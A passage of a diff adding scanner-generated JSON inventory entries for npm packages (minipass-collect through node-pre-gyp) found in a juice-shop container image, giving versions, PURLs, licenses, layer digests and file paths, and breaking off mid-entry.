"Name": "minipass-collect", + "Identifier": { + "PURL": "pkg:npm/minipass-collect@1.0.2", + "UID": "fa23366ed6d624b6" + }, + "Version": "1.0.2", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/minipass-collect/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "minipass-collect@2.0.1", + "Name": "minipass-collect", + "Identifier": { + "PURL": "pkg:npm/minipass-collect@2.0.1", + "UID": "aa84757288097f32" + }, + "Version": "2.0.1", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/minipass-collect/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "minipass-fetch@1.4.1", + "Name": "minipass-fetch", + "Identifier": { + "PURL": "pkg:npm/minipass-fetch@1.4.1", + "UID": "9eceabcf77ad106c" + }, + "Version": "1.4.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/minipass-fetch/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "minipass-fetch@4.0.1", + "Name": "minipass-fetch", + "Identifier": { + "PURL": "pkg:npm/minipass-fetch@4.0.1", + "UID": "10f66a75497bc178" + }, + "Version": "4.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/minipass-fetch/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "minipass-flush@1.0.7", + "Name": "minipass-flush", + "Identifier": { + "PURL": "pkg:npm/minipass-flush@1.0.7", + "UID": "b7690acc47a5b9ef" + }, + "Version": "1.0.7", + "Licenses": [ + "BlueOak-1.0.0" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/minipass-flush/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "minipass-pipeline@1.2.4", + "Name": "minipass-pipeline", + "Identifier": { + "PURL": "pkg:npm/minipass-pipeline@1.2.4", + "UID": "eb7a34495905f8c2" + }, + "Version": "1.2.4", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/minipass-pipeline/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "minipass-sized@1.0.3", + "Name": "minipass-sized", + "Identifier": { + "PURL": "pkg:npm/minipass-sized@1.0.3", + "UID": "d6d1edc3af99c4f8" + }, + "Version": "1.0.3", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/minipass-sized/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "minizlib@1.3.3", + "Name": "minizlib", + "Identifier": { + "PURL": "pkg:npm/minizlib@1.3.3", + "UID": "1d9bab89ff4888b5" + }, + "Version": "1.3.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/node-pre-gyp/node_modules/minizlib/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "minizlib@2.1.2", + "Name": "minizlib", + "Identifier": { + "PURL": "pkg:npm/minizlib@2.1.2", + "UID": "c2a49aa3c2af3f0e" + }, + "Version": "2.1.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/minizlib/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "minizlib@3.1.0", + "Name": "minizlib", + "Identifier": { + "PURL": "pkg:npm/minizlib@3.1.0", + "UID": "3cbfa97c67b6cd04" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/minizlib/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "mkdirp@0.5.6", + "Name": "mkdirp", + "Identifier": { + "PURL": "pkg:npm/mkdirp@0.5.6", + "UID": "553efa9a141182f8" + }, + "Version": "0.5.6", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/mkdirp/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "mkdirp@1.0.4", + "Name": "mkdirp", + "Identifier": { + "PURL": "pkg:npm/mkdirp@1.0.4", + "UID": "78218f9b50a3927c" + }, + "Version": "1.0.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@npmcli/move-file/node_modules/mkdirp/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "mkdirp@1.0.4", + "Name": "mkdirp", + "Identifier": { + "PURL": "pkg:npm/mkdirp@1.0.4", + "UID": "56a2ecd9ecb691d0" + }, + "Version": "1.0.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/mkdirp/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "mkdirp-classic@0.5.3", + "Name": "mkdirp-classic", + "Identifier": { + "PURL": "pkg:npm/mkdirp-classic@0.5.3", + "UID": "b11cf86855cf6ac1" + }, + "Version": "0.5.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/mkdirp-classic/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "moment@2.0.0", + "Name": "moment", + "Identifier": { + "PURL": "pkg:npm/moment@2.0.0", + "UID": "7017ad3e12e409e7" + }, + "Version": "2.0.0", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/express-jwt/node_modules/moment/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "moment@2.30.1", + "Name": "moment", + "Identifier": { + "PURL": "pkg:npm/moment@2.30.1", + "UID": "7e7ef1a02c6d6fba" + }, + "Version": "2.30.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/moment/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "moment-timezone@0.5.48", + "Name": "moment-timezone", + "Identifier": { + "PURL": "pkg:npm/moment-timezone@0.5.48", + "UID": "47442568e6a0648e" + }, + "Version": "0.5.48", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/moment-timezone/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "morgan@1.10.1", + "Name": "morgan", + "Identifier": { + "PURL": "pkg:npm/morgan@1.10.1", + "UID": "f8b85e32da58316b" + }, + "Version": "1.10.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/morgan/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ms@2.0.0", + "Name": "ms", + "Identifier": { + "PURL": "pkg:npm/ms@2.0.0", + "UID": "5f04d9f9db24afe1" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/ms/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ms@2.1.3", + "Name": "ms", + "Identifier": { + "PURL": "pkg:npm/ms@2.1.3", + "UID": "3fd4cb62f4432e28" + }, + "Version": "2.1.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/engine.io/node_modules/ms/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ms@2.1.3", + "Name": "ms", + "Identifier": { + "PURL": "pkg:npm/ms@2.1.3", + "UID": "57b1a732851b2812" + }, + "Version": "2.1.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/http-proxy-agent/node_modules/ms/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ms@2.1.3", + "Name": "ms", + "Identifier": { + "PURL": "pkg:npm/ms@2.1.3", + "UID": "4e4ef59e5d7a1789" + }, + "Version": "2.1.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/https-proxy-agent/node_modules/ms/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ms@2.1.3", + "Name": "ms", + "Identifier": { + "PURL": "pkg:npm/ms@2.1.3", + "UID": "760e0587d09e041f" + }, + "Version": "2.1.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/logform/node_modules/ms/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ms@2.1.3", + "Name": "ms", + "Identifier": { + "PURL": "pkg:npm/ms@2.1.3", + "UID": "d286bb3051febfba" + }, + "Version": "2.1.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/needle/node_modules/ms/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ms@2.1.3", + "Name": "ms", + "Identifier": { + "PURL": "pkg:npm/ms@2.1.3", + "UID": "e5cdc7da8e24b12c" + }, + "Version": "2.1.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/send/node_modules/ms/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ms@2.1.3", + "Name": "ms", + "Identifier": { + "PURL": "pkg:npm/ms@2.1.3", + "UID": "ce5469d9ec8fa4a1" + }, + "Version": "2.1.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sequelize/node_modules/ms/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ms@2.1.3", + "Name": "ms", + "Identifier": { + "PURL": "pkg:npm/ms@2.1.3", + "UID": "5b06d1db5dd62329" + }, + "Version": "2.1.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/socket.io-parser/node_modules/ms/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ms@2.1.3", + "Name": "ms", + "Identifier": { + "PURL": "pkg:npm/ms@2.1.3", + "UID": "f083c4b4cb82e8fd" + }, + "Version": "2.1.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/socket.io/node_modules/ms/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ms@2.1.3", + "Name": "ms", + "Identifier": { + "PURL": "pkg:npm/ms@2.1.3", + "UID": "f7a8946428edfce2" + }, + "Version": "2.1.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/socks-proxy-agent/node_modules/ms/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ms@2.1.3", + "Name": "ms", + "Identifier": { + "PURL": "pkg:npm/ms@2.1.3", + "UID": "300b6a92d4be9dc9" + }, + "Version": "2.1.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/ms/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "multer@1.4.5-lts.2", + "Name": "multer", + "Identifier": { + "PURL": "pkg:npm/multer@1.4.5-lts.2", + "UID": "b0c681a9db76ceba" + }, + "Version": "1.4.5-lts.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/multer/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "mustache@4.2.0", + "Name": "mustache", + "Identifier": { + "PURL": "pkg:npm/mustache@4.2.0", + "UID": "e20a565b9c3cbff2" + }, + "Version": "4.2.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/mustache/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "mylib@0.0.0", + "Name": "mylib", + "Identifier": { + "PURL": "pkg:npm/mylib@0.0.0", + "UID": "5239c7d52e156feb" + }, + "Version": "0.0.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/resolve/test/resolver/nested_symlinks/mylib/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "nan@2.22.2", + "Name": "nan", + "Identifier": { + "PURL": "pkg:npm/nan@2.22.2", + "UID": "f556e301dab2fdce" + }, + "Version": "2.22.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/nan/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "napi-build-utils@1.0.2", + "Name": "napi-build-utils", + "Identifier": { + "PURL": "pkg:npm/napi-build-utils@1.0.2", + "UID": "3ec9e881310cefb6" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/napi-build-utils/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "napi-build-utils@2.0.0", + "Name": "napi-build-utils", + "Identifier": { + "PURL": "pkg:npm/napi-build-utils@2.0.0", + "UID": "8e5c1733cc0c2d04" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/libxmljs2/node_modules/napi-build-utils/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "napi-build-utils@2.0.0", + "Name": "napi-build-utils", + "Identifier": { + "PURL": "pkg:npm/napi-build-utils@2.0.0", + "UID": "a246e88b1ffb6de7" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/napi-build-utils/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "needle@2.9.1", + "Name": "needle", + "Identifier": { + "PURL": "pkg:npm/needle@2.9.1", + "UID": "fea76174be8540ba" + }, + "Version": "2.9.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/needle/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "negotiator@0.6.3", + "Name": "negotiator", + "Identifier": { + "PURL": "pkg:npm/negotiator@0.6.3", + "UID": "b953921fbc6746f7" + }, + "Version": "0.6.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/accepts/node_modules/negotiator/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "negotiator@0.6.4", + "Name": "negotiator", + "Identifier": { + "PURL": "pkg:npm/negotiator@0.6.4", + "UID": "e032268fe0707464" + }, + "Version": "0.6.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/negotiator/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "negotiator@1.0.0", + "Name": "negotiator", + "Identifier": { + "PURL": "pkg:npm/negotiator@1.0.0", + "UID": "d3b3f2f7339bda0a" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/make-fetch-happen/node_modules/negotiator/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "neo-async@2.6.2", + "Name": "neo-async", + "Identifier": { + "PURL": "pkg:npm/neo-async@2.6.2", + "UID": "d3710d1985c60c4f" + }, + "Version": "2.6.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/neo-async/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "neoip@2.1.0", + "Name": "neoip", + "Identifier": { + "PURL": "pkg:npm/neoip@2.1.0", + "UID": "1e1c1d9c98d6e26f" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/neoip/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "node-abi@2.30.1", + "Name": "node-abi", + "Identifier": { + "PURL": "pkg:npm/node-abi@2.30.1", + "UID": "2943a5bb118020e3" + }, + "Version": "2.30.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/node-abi/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "node-abi@3.92.0", + "Name": "node-abi", + "Identifier": { + "PURL": "pkg:npm/node-abi@3.92.0", + "UID": "2d2e986a0a756cef" + }, + "Version": "3.92.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/libxmljs2/node_modules/node-abi/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "node-abi@3.92.0", + "Name": "node-abi", + "Identifier": { + "PURL": "pkg:npm/node-abi@3.92.0", + "UID": "a0c46342fc134332" + }, + "Version": "3.92.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/node-abi/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "node-addon-api@7.1.1", + "Name": "node-addon-api", + "Identifier": { + "PURL": "pkg:npm/node-addon-api@7.1.1", + "UID": "a45a81eac0b18bdc" + }, + "Version": "7.1.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/node-addon-api/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "node-gyp@11.5.0", + "Name": "node-gyp", + "Identifier": { + "PURL": "pkg:npm/node-gyp@11.5.0", + "UID": "691ce68ac4802d57" + }, + "Version": "11.5.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/node-gyp/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "node-gyp@8.4.1", + "Name": "node-gyp", + "Identifier": { + "PURL": "pkg:npm/node-gyp@8.4.1", + "UID": "c94fcda9b650a9d0" + }, + "Version": "8.4.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/node-gyp/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "node-pre-gyp@0.15.0", + "Name": "node-pre-gyp", + "Identifier": { + "PURL": "pkg:npm/node-pre-gyp@0.15.0", + "UID": "29727e9215362b29" + }, + "Version": "0.15.0", + "Licenses": [ + "BSD-3-Clause" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/node-pre-gyp/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "noop-logger@0.1.1", + "Name": 